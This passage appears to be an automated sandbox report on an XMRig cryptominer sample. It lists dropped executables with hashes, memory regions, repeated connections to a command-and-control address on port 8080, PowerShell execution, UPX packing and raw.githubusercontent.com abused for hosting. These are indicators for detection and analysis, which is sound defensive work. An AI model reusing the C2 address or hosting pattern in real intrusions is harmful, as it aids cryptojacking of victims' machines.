C:\Windows\System\WDZwuJt.exe

C:\Windows\System\GcxNxQr.exe

C:\Windows\System\GcxNxQr.exe

C:\Windows\System\kznjxPd.exe

C:\Windows\System\kznjxPd.exe

C:\Windows\System\eXmxyKG.exe

C:\Windows\System\eXmxyKG.exe

C:\Windows\System\CnrJBMx.exe

C:\Windows\System\CnrJBMx.exe

C:\Windows\System\EEVkzkX.exe

C:\Windows\System\EEVkzkX.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/1600-0-0x00000000001F0000-0x0000000000200000-memory.dmp

\Windows\system\boMoguf.exe

MD5 b99916adf32ea742b5826833aad55406
SHA1 9a90919153e7f275ed1769fb309b27ea1d71c3df
SHA256 e37fca61578ecd9496a1bd116da94aca2ca9f20fe20200cd3bb452d642ce832c
SHA512 6c4e97917129d63783464b81e67f51621713425e1469c31ffc564005aa040fb493ce4e5b1bbd8f9755f2b2394a5a70758192cedcf85a86ab479d37ec77c9c1df

memory/1600-2-0x000000013FAA0000-0x000000013FE96000-memory.dmp

\Windows\system\iQoVlVu.exe

MD5 1deb13efd962c6785a2fa379d8a62dae
SHA1 d1cb0c2635081cfbc868c45512337dd4e61e9e2b
SHA256 eee4a13c4db93a4abc901c2f4348422d3ce267156adc69029ec0b11e1b967f36
SHA512 ccf3c129d17c50cb9fd1303c82209525b16015b81872aa71ac6999bd9662aabf26c9da185d12e60a13db8d0b37c0bc60851d9083ab74ba44162daa3c982c9b05

C:\Windows\system\XmUppaC.exe

MD5 56316c531a15f6301d5eafab1cc85e6c
SHA1 5890ad7bbeae7dc09ea5ee7d5348ff936be4d8ef
SHA256 4b6965947e2af08f50e1426a49da52824ceafd095feb2b13ddd1f825982ad72b
SHA512 9bcd05861d9315a4371081143e48d09878181e5bad523a5121b1add052696a3e1f337e4dd08aa534cdf03158bfaf7d702759ad06576fcc6e672c43644f672a93

C:\Windows\system\XWhXKiz.exe

MD5 b8131c05bd83e7557ad6ce3847b73421
SHA1 dc6d9e4ca4a4b631d246e92b35531ddd4c293fb8
SHA256 09c2faf32ed273af79a8e89724d52a91ce0876cb70c2eb14189ef27beeab0bbb
SHA512 73d7f145dd30b5e779c987c3f5e91a7b1704b890430f948e4579988df12416efc09ddb0e3bf94e5bac9d28e37603675c9d34247a5d80e9c226de3e8c972a6cbb

C:\Windows\system\liMpmKv.exe

MD5 094a88ed15606a33d6bd8609d74b76f6
SHA1 e8b12845f6df92992aa97cef5bbefa262d77fe10
SHA256 e5e5ebedfafb2fcc1754850c8778f4d0070617a31e8e2c736c5bafe468f7d939
SHA512 3d22f3e0b102ee9b4857c167c035665e79897ceab9f6d9f837a1d6845df3310593a285a86e8512ef453889187518ee0f0f897ba8b634b8d879893b1865911c01

\Windows\system\plupKYM.exe

MD5 7926543396a7516c361ddbc45c6a8cc8
SHA1 cdaffdd2ac82e291a664b52803bac15463816448
SHA256 76dbc1357a12d11cb298295444bcb47cc3ac22af645be928dc9bf6a854e02478
SHA512 8ae5148b54aa634e2f86dc475cfbaa66d78f36e8ed319dd10ab0328f5e823d669011f43696933b02a597c4332458009b28fadb55be680bca9795b8a5c0c0f768

memory/1600-42-0x0000000002760000-0x0000000002B56000-memory.dmp

memory/1600-43-0x0000000002A30000-0x0000000002E26000-memory.dmp

memory/2980-44-0x000000013FB50000-0x000000013FF46000-memory.dmp

memory/1600-59-0x0000000003070000-0x0000000003466000-memory.dmp

memory/2788-64-0x000000013FDF0000-0x00000001401E6000-memory.dmp

memory/2672-68-0x000000013FF30000-0x0000000140326000-memory.dmp

memory/1600-79-0x0000000003070000-0x0000000003466000-memory.dmp

memory/1600-81-0x0000000003070000-0x0000000003466000-memory.dmp

memory/1600-83-0x000000013F200000-0x000000013F5F6000-memory.dmp

memory/1600-89-0x0000000003070000-0x0000000003466000-memory.dmp

C:\Windows\system\qcypcLz.exe

MD5 4063380560abb7f1ccf954bbaae59928
SHA1 48a97f697b0c50f35b930f78244eb272d640c731
SHA256 4316a00c7a84662708c238099b3eb7c1a7d525941a5f5c3c2613d1e74e5d9005
SHA512 b2856e750aab9c643323e3f9859864b1fb6256c073f3023fed2ce63ef2b78855a9e05925fac12b549142cca21c08d975a6930d801f2439db43cceb5adc132150

memory/2296-111-0x000000001B560000-0x000000001B842000-memory.dmp

C:\Windows\system\AFSEpfB.exe

MD5 655e39ae231300b4e2a595a72230d2e6
SHA1 00577b5514e3b486ae669b49c10b71f80d1ddc72
SHA256 c4abc27068ca371a494b5d7d185fd508ec176e95d33a65d0a13b91d1e222f2d3
SHA512 a45154c476cd8b23068601c58796bd325fe2693fccc4f90d3ca2b2eb506351b9c7ae9652101653fb28c87feccc8f6c88616a173f8ff4e3c3d3a4f130e22f4bea

C:\Windows\system\oamUrnf.exe

MD5 ae079f31a682f1c629089e2a3b44c905
SHA1 52a6df5b01b9531fc6693ee7e0190d19707e59f5
SHA256 a11944ae41bc2aa23144fe47a6902d0e3dc64a5ef82b669d047962a9f6189734
SHA512 ace82e4c933bcba25bf52f2acc7912098136369e39e3853a85b04d83f2a3a83bbb98b0df944a23b79918395f73154b7ea9e33389707277dc64d27abbdc2a2978

C:\Windows\system\lkeyDyB.exe

MD5 754452c616f2b1f181eb95bd43a12f99
SHA1 1eae257d564fc75bfecbfd39da3a671a11ef1500
SHA256 dfe077601254588a53c2554b10adaebd89bc7acddb2a28a8db884d8121096632
SHA512 9e1636e2262ad1106821d532cffc7812f510e886732c184cd3032727743beb0b7cb307d18001dbbc2a0825b0ce0b3afc18ee711ad0af53de153f589f38ed3ad7

C:\Windows\system\dSNZCQF.exe

MD5 d3ef05abba5f708127ef918167df6f07
SHA1 90614e837dd30761017991a5f0e5bb320330e7a7
SHA256 0a76f030bb614b2dd32adb71b47183682fae3917003dbaaf6fde91c13be3a42e
SHA512 d6af950bdbbdd94de42cefdd5aa1e5c362d2904f31a705f690775135ea1613145ed8256849cfe4b4b391f69b2fefcfc13e6bc59c39edd3aaf4ec55d82848f2d1

C:\Windows\system\DdXURTq.exe

MD5 68f35132cf5595b270f34bb27defe123
SHA1 798bf78acb220269fee0e01ded8219186bc3c30f
SHA256 332cefff95f5525d9b142b8ff8b5451d63e9dfa989f2cfdcfb67d2333b27e8f4
SHA512 ae46d373bacb3e62c1239fb5d428cbf59f4056d7316d1db7d08dba916c422c4c606ac3b7a18f28a05c083225e196de516c4e3fff92e3b15a0e9c7de67dcbd359

C:\Windows\system\wyKiHFz.exe

MD5 f3e808af58e098b99565dadf69705343
SHA1 eb3812d9c65abd86c96656035ae285b863334084
SHA256 9ef6cff946c0ae4d773a3ee350f9b731758e32f5550d86b3c17bca19ce91bc0a
SHA512 02b8e97f1d17d4b4734961278f1ee244362cb25048b9c5ac08edf3f9a3533a41e701178d26ee283b1764e5603459dae0b5731713d4dab0c621b5732b64e6c4ae

\Windows\system\sMjQmSh.exe

MD5 58d178d01708a5f9dfa4b7aa68aee220
SHA1 d9aa131a2c950b9715ca609e1d38ca5839fdf448
SHA256 4f37e61de036407e46c87bbfdcbe2810234e98f142e5dc1c643bd22bd0e33307
SHA512 1623ce07908f4840487dc92f6b20b242f5a5b07ac2d15dada0199ee36b6883e501c9282dbe9ec04306324ab26ecfbab8618baed2d492af1db1e8ce96549f2a75

\Windows\system\bslXWOc.exe

MD5 a8d9189a6426586c961e94964160f375
SHA1 27f4c53042c3d7d4e7b7b98082c4eff7269418f1
SHA256 2b8b7cf33243635a4c769eaa4dd3fd586e262f669ec9303bef04f177d13a632e
SHA512 67d216e811ec3efa20c6d457cdbbe0d1cc88eb9bdaab1d94fa4eef55dc7fca4982b9c48d9d63181145d511fe838a44df364eab26ad7375c9c93168e64e88a833

memory/1600-2591-0x000000013FAA0000-0x000000013FE96000-memory.dmp

\Windows\system\OfpgkLf.exe

MD5 a2cb73452fc2ec823af1fa4650c8a3a5
SHA1 0c9eb7a56c4ff231eadefbee3ebd403abbf4a238
SHA256 1b464c61cdec93915589b86ea3866c8d30dd730ce8c07c05c5640a0491d7f3ab
SHA512 f89823d0aad6a94e8333da4674f4b5169117a445c94e6d7b3b04ae54471da3271f483e5415eccb0984ce8000d4e2d41dea9d36fc2a0db917831578b59ab48496

C:\Windows\system\nDPBRxQ.exe

MD5 ba67ac47054e0fc36febe271186a687e
SHA1 4d31e42efc7cec11ee810a422cea8f2cdbb87a15
SHA256 56868d379aeca43e9822ec22ef7b15a029417c6284ae9b8512db5c1173392007
SHA512 c11c9727ea5e5722c16064e37626abbb3658674e81d6626b929a447184dcfe959f455f67dce29288807b810aa2c18eb6b68e1d91a092e099e909329b2dea5f93

C:\Windows\system\GEuQvGW.exe

MD5 67b879862c438088e02ef7082c9ccc6d
SHA1 88969879d4a6f9e1cd1cc4812a6935f72697bd52
SHA256 73bae6331813969fb60902641747ae7b02b8d7df82a8648545fab150f3ffe856
SHA512 ae64eff5d4f5303a11a112208af4f91e1dbb5685a9ca80442293be9204b3ce8c2fe08595ca3b8838c5e0fc55b5e0da0cb471ef0f44bc27a002d158d353465e4a

C:\Windows\system\LNcqjwO.exe

MD5 2b61c149d124b6eee2ced3d3e543573a
SHA1 bfc9be1d2794c54d1216f8f545a8868816f8812e
SHA256 40b305e842a7c114a8f713203f34145a7d42615bbc92dbf34019c88525b108c3
SHA512 3f9aeea12bc77b9dbd758df657b9e268c2d800608fadc69a3b954383302fa124b5ec2f0ea68a581c522afc533388d895e1b86cfed5e53a718ec14705f7979a8e

C:\Windows\system\EvkUEIs.exe

MD5 f3186104369b121eb49b4d9b877e1b4f
SHA1 c607ff1e544bde6d4855ee04e9d762f95e78b59a
SHA256 fe937279536b334cb1ae92c94a776c661a63b41d797626ca777c0795bd123087
SHA512 feb2a164d0ca84c9efcfa175794f28bf3281d1d181ede5e2919a4a45fef03de6a34d85e089f41fe4c47921478253c2001731b098df6db0fd7ceee8df97c67424

C:\Windows\system\PhEMEYy.exe

MD5 3b84e918d538d98fc0402a2816994825
SHA1 845482784274171e3ec4f2cfc9c13dcdc256d351
SHA256 56682bcb9103ee9d6e0dbf83847b045ee77642f54bb2d62f01c4e2b10199308e
SHA512 e54f12d033cf387b14d5b182e130cc4abbb72e96dae338bcf19aaa33dcab223dbf377bf00496a47b2052a29b2af639d6701f605791c02a31a9e9d715ab3fb8dc

C:\Windows\system\JGtYHFa.exe

MD5 cce60b8ebb24f281237566c692aebc25
SHA1 72540c99ba01da72b41f5c94ad5984dc53742db9
SHA256 d217822fa6d4563b569852bc4f289ad4a40da4bdc5a752ed26b6d760bbb2f712
SHA512 1e01ade7e862e941e602a8988a845b9f234af7a1aee903a359f83dd41d34b3f00092acedabbf4db50cd202e80db2079efb96625ff17e02b3520676b6253d46bf

C:\Windows\system\vmvEDaL.exe

MD5 d27d4b5c1e09faeb7c7331e152a94a57
SHA1 72c17de06e4563b64b7c9baf84f94b26963bd5dd
SHA256 e63f353e87ffbcd41dbdae4a786a7938a449045905653270af171bd8dd76ecb0
SHA512 01be23d9b8b39c4246baf1765fca5025d530bd808185e1cb5634d6439c88d35f3a5e2f8e1d2fbfdcbab3a6a5de90f964eb6a5b49d722545d77b999a84975011b

memory/2296-117-0x0000000002690000-0x0000000002698000-memory.dmp

C:\Windows\system\ebLBrBw.exe

MD5 f45608badfbf98dd314c1a400d7c2e57
SHA1 1437f9e78253c0c34023ea049ed3f16a79a29556
SHA256 0d46d3767fc6a634ddfe285abeed2451d0eee6a6b1e5f1f9e62b8c0e3f43be9d
SHA512 c5b38ab324b7e49cc4b44ddb9379c5154b164cbd5207bafb99c75f8ac5abb026c55ca3b41c87a810ec8fb7bfd186596376d1e40889527173c707ed809b487b00

C:\Windows\system\MNTgqrx.exe

MD5 aa4f7246425e7d1b7faecb790824fb7e
SHA1 e4e054c529035ebd7fe35e7a517c9f8797ff25b8
SHA256 38ee4353377006d1fed60fc0ee55d6a7d2a97ed16e78a787ab068667af8fbdb8
SHA512 da634471d57a0f83c4137a9c348233faf4d28e6e42522c0e703eafc42ebf4d45cb7abba9d76bcfd68e51f7fed4de372a0f63e998a92359506d5fdb36fe381ff5

C:\Windows\system\qlRKsKJ.exe

MD5 b9f8786c12f3453182ac147819277a0b
SHA1 9cc87c5039397c6aaeff87f218dbe81546fd0f78
SHA256 e1ca54c7e949a8d425933b0fcc109fd24a90edc6d02d9974db792982db537d25
SHA512 146ebab7f5351468c390c33aca603bc3b99109aa03a986823740d80c8a02dae969ccdf646f392c7ae0d55ef3d8c710165f182449408d58aeb5f558cd8e0f06ce

C:\Windows\system\cdaHRpZ.exe

MD5 9467127ca915f6a4db26f4770f78d66b
SHA1 dfa5e89c894a1d4c2f95d1813b2a3af95c2bb3bd
SHA256 6a8b189e99a1bfa0a725bf57e96abce6790f39de297eb24d9c30b35f546a9b35
SHA512 fcdc944dc1bddf7030bfac6af24d4a023da54140b8da4a9700710a0ec22fc223b067e88b1ed4121725e06e6946e77fd6b9b094ca51f9b0911c450108e55cbcff

memory/2684-90-0x000000013FA50000-0x000000013FE46000-memory.dmp

C:\Windows\system\uLLcFTT.exe

MD5 4184e274047ac55a1e80a68b9c4f73d2
SHA1 9fd8d41b7d92269843b7fa26cfc5899a4c3a0f26
SHA256 2d42b81722936b8720147b353a6e9ec5fdf41d19c69152d46b0335244039abaf
SHA512 fb4ebf9770f84236fb8fea39958bcd3737f2e3caae4647ee21e0c00e18992ca507dbce305ec44eae7260dc67696b13be80539353a809a0b64b12d486c1b29f2f

memory/1264-82-0x000000013F200000-0x000000013F5F6000-memory.dmp

memory/2580-80-0x000000013FDF0000-0x00000001401E6000-memory.dmp

memory/2508-78-0x000000013FB40000-0x000000013FF36000-memory.dmp

memory/1600-72-0x0000000003070000-0x0000000003466000-memory.dmp

C:\Windows\system\EjtWVbQ.exe

MD5 5decd473a0466aa58227ef417e3db83e
SHA1 ef275bd9307e937e3bf12d09f05dd3cf760f1dff
SHA256 89c880526c8ff17fe4b084d4fde308f01cb46e2d881cbc5d2671dc2421082a7f
SHA512 7db3052febfd82f82a85bcc4aa9371815319fad41bff6776ac347b50fd0a333a37c9e8dd4219f528ed5ae923e5fbe3cbfdcf19f7cceff75b766166c51ff9ffc7

memory/1600-71-0x0000000003070000-0x0000000003466000-memory.dmp

memory/2300-70-0x000000013FBA0000-0x000000013FF96000-memory.dmp

memory/2992-69-0x000000013F740000-0x000000013FB36000-memory.dmp

memory/1600-65-0x000000013FF30000-0x0000000140326000-memory.dmp

C:\Windows\system\RMWtnjz.exe

MD5 4556730991c89e9c86705bd3bd03fd7e
SHA1 d22fe43ee21c45b9720f9e4173cfd734a92bd71b
SHA256 423b906d5c136422b8d3c7be56b64488b913aec4671d3debf44e26fff367c69e
SHA512 4ac9838e3e3526a404e5edea3aa2bffea57c825d48cd937953ae0cebf82075fd3d2b0350a9a6a312264a88406014a7901970b60845ee706556459c2b8c2be2ea

memory/2624-58-0x000000013F260000-0x000000013F656000-memory.dmp

memory/2288-51-0x000000013FAB0000-0x000000013FEA6000-memory.dmp

C:\Windows\system\FdiSYks.exe

MD5 b5bf6b2e9d42bed32eb2d2d58c2e23ae
SHA1 5913608361e692fc85a9eae9092ebed4cc2d9ef7
SHA256 fe35385a7f515b26098e121dad922e94352a91eb503bca08e5da896e4c6d057b
SHA512 fc91879dd14f54fa4095b1e2287aa311a0611713e23bf36b54bc79c7c67d037e14c287ad91effedba60275a8370b5bc0e3701ce1df47d4229eca6279361468dc

memory/1600-49-0x0000000003070000-0x0000000003466000-memory.dmp

memory/2764-47-0x000000013F820000-0x000000013FC16000-memory.dmp

C:\Windows\system\ADELqbG.exe

MD5 0b858234ba3ae696de837cbc5ae1a33d
SHA1 29cb0b2dcf54e029589d873a1739dec6fc92998d
SHA256 fe76f2ffd93c2c7085a510f705c4acf12f12eec70d5ffe08cf90caf48077a372
SHA512 3b32e67b2b8f90050a359650c709ea2cf23fb5048f479effb04ca5480880dff0dc195afbc4c51a3294c9eb25d664c1ea5118104e2e2781cbbb39476be1f853ed

memory/1600-52-0x000000013F260000-0x000000013F656000-memory.dmp

C:\Windows\system\xvHeImQ.exe

MD5 44f62f99ce9f027f9f1424136b5fcd72
SHA1 04d7d9d81043c6f53275a8e741ffd480999b4e0d
SHA256 dc7297eaca29c4fa313e86554d98446d0e83bd5b8b1c4946fba19ac5fb35840a
SHA512 8257bb27e6ddf94d8fdaa2e6519457e6ab36eff19122d813e8d2a88f6dff0409722028966fa5037924b479f6d430f648d6747ed7fc563dd7177bcc85fc2b4bea

memory/2288-5590-0x000000013FAB0000-0x000000013FEA6000-memory.dmp

memory/2672-5593-0x000000013FF30000-0x0000000140326000-memory.dmp

memory/2580-5600-0x000000013FDF0000-0x00000001401E6000-memory.dmp

memory/2508-5599-0x000000013FB40000-0x000000013FF36000-memory.dmp

memory/2992-5621-0x000000013F740000-0x000000013FB36000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 21:59

Reported

2024-06-13 22:01

Platform

win10v2004-20240611-en

Max time kernel

125s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\boMoguf.exe N/A
N/A N/A C:\Windows\System\iQoVlVu.exe N/A
N/A N/A C:\Windows\System\XmUppaC.exe N/A
N/A N/A C:\Windows\System\XWhXKiz.exe N/A
N/A N/A C:\Windows\System\xvHeImQ.exe N/A
N/A N/A C:\Windows\System\liMpmKv.exe N/A
N/A N/A C:\Windows\System\plupKYM.exe N/A
N/A N/A C:\Windows\System\FdiSYks.exe N/A
N/A N/A C:\Windows\System\ADELqbG.exe N/A
N/A N/A C:\Windows\System\RMWtnjz.exe N/A
N/A N/A C:\Windows\System\EjtWVbQ.exe N/A
N/A N/A C:\Windows\System\uLLcFTT.exe N/A
N/A N/A C:\Windows\System\cdaHRpZ.exe N/A
N/A N/A C:\Windows\System\qlRKsKJ.exe N/A
N/A N/A C:\Windows\System\MNTgqrx.exe N/A
N/A N/A C:\Windows\System\qcypcLz.exe N/A
N/A N/A C:\Windows\System\ebLBrBw.exe N/A
N/A N/A C:\Windows\System\vmvEDaL.exe N/A
N/A N/A C:\Windows\System\JGtYHFa.exe N/A
N/A N/A C:\Windows\System\PhEMEYy.exe N/A
N/A N/A C:\Windows\System\EvkUEIs.exe N/A
N/A N/A C:\Windows\System\wyKiHFz.exe N/A
N/A N/A C:\Windows\System\DdXURTq.exe N/A
N/A N/A C:\Windows\System\GEuQvGW.exe N/A
N/A N/A C:\Windows\System\dSNZCQF.exe N/A
N/A N/A C:\Windows\System\nDPBRxQ.exe N/A
N/A N/A C:\Windows\System\lkeyDyB.exe N/A
N/A N/A C:\Windows\System\OfpgkLf.exe N/A
N/A N/A C:\Windows\System\oamUrnf.exe N/A
N/A N/A C:\Windows\System\bslXWOc.exe N/A
N/A N/A C:\Windows\System\AFSEpfB.exe N/A
N/A N/A C:\Windows\System\sMjQmSh.exe N/A
N/A N/A C:\Windows\System\LNcqjwO.exe N/A
N/A N/A C:\Windows\System\JqXWfGK.exe N/A
N/A N/A C:\Windows\System\QUuRjPJ.exe N/A
N/A N/A C:\Windows\System\YSVUtZS.exe N/A
N/A N/A C:\Windows\System\hMZHoYw.exe N/A
N/A N/A C:\Windows\System\qUQgRPL.exe N/A
N/A N/A C:\Windows\System\KSiCwAU.exe N/A
N/A N/A C:\Windows\System\VmhBdBB.exe N/A
N/A N/A C:\Windows\System\mSTTUhV.exe N/A
N/A N/A C:\Windows\System\DStCmgL.exe N/A
N/A N/A C:\Windows\System\jyLsbwn.exe N/A
N/A N/A C:\Windows\System\ZoEZcyu.exe N/A
N/A N/A C:\Windows\System\jLlKNww.exe N/A
N/A N/A C:\Windows\System\gKTEGyA.exe N/A
N/A N/A C:\Windows\System\lVDJAca.exe N/A
N/A N/A C:\Windows\System\TGOMiZg.exe N/A
N/A N/A C:\Windows\System\gdIGmEO.exe N/A
N/A N/A C:\Windows\System\WRuqRhu.exe N/A
N/A N/A C:\Windows\System\zzPVvQy.exe N/A
N/A N/A C:\Windows\System\RyPiaWN.exe N/A
N/A N/A C:\Windows\System\uUvbHaL.exe N/A
N/A N/A C:\Windows\System\ExGEuVW.exe N/A
N/A N/A C:\Windows\System\jlIDvOK.exe N/A
N/A N/A C:\Windows\System\EvhosdO.exe N/A
N/A N/A C:\Windows\System\kPGQmsO.exe N/A
N/A N/A C:\Windows\System\zTxUbIJ.exe N/A
N/A N/A C:\Windows\System\aRrORpy.exe N/A
N/A N/A C:\Windows\System\uCmFlfk.exe N/A
N/A N/A C:\Windows\System\qZVsdEd.exe N/A
N/A N/A C:\Windows\System\ABsWUOs.exe N/A
N/A N/A C:\Windows\System\fWHsKGW.exe N/A
N/A N/A C:\Windows\System\RCqywIx.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\WuhQDQT.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PbBOdFR.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nnDnUkC.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BVvOSXN.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yRvrNPU.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BVqutim.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\geszFVn.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZfWfVNE.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cJUdrYy.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fShnSOG.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BzOLahO.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LtXCsEr.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UNHfoxL.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BXmowWm.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SPYVskn.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vKMibVG.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SpObFnp.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TPnZjVq.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BAnGZZw.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\batccqN.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iDJMYMp.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UPuCgmc.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\THmvIdY.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MYVfcvK.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JfaJkTf.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oYPrWtI.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NUBoXVV.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PSGXxsX.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VFGwUGZ.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nWitbOm.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uoHJzZW.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ppGzZpU.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
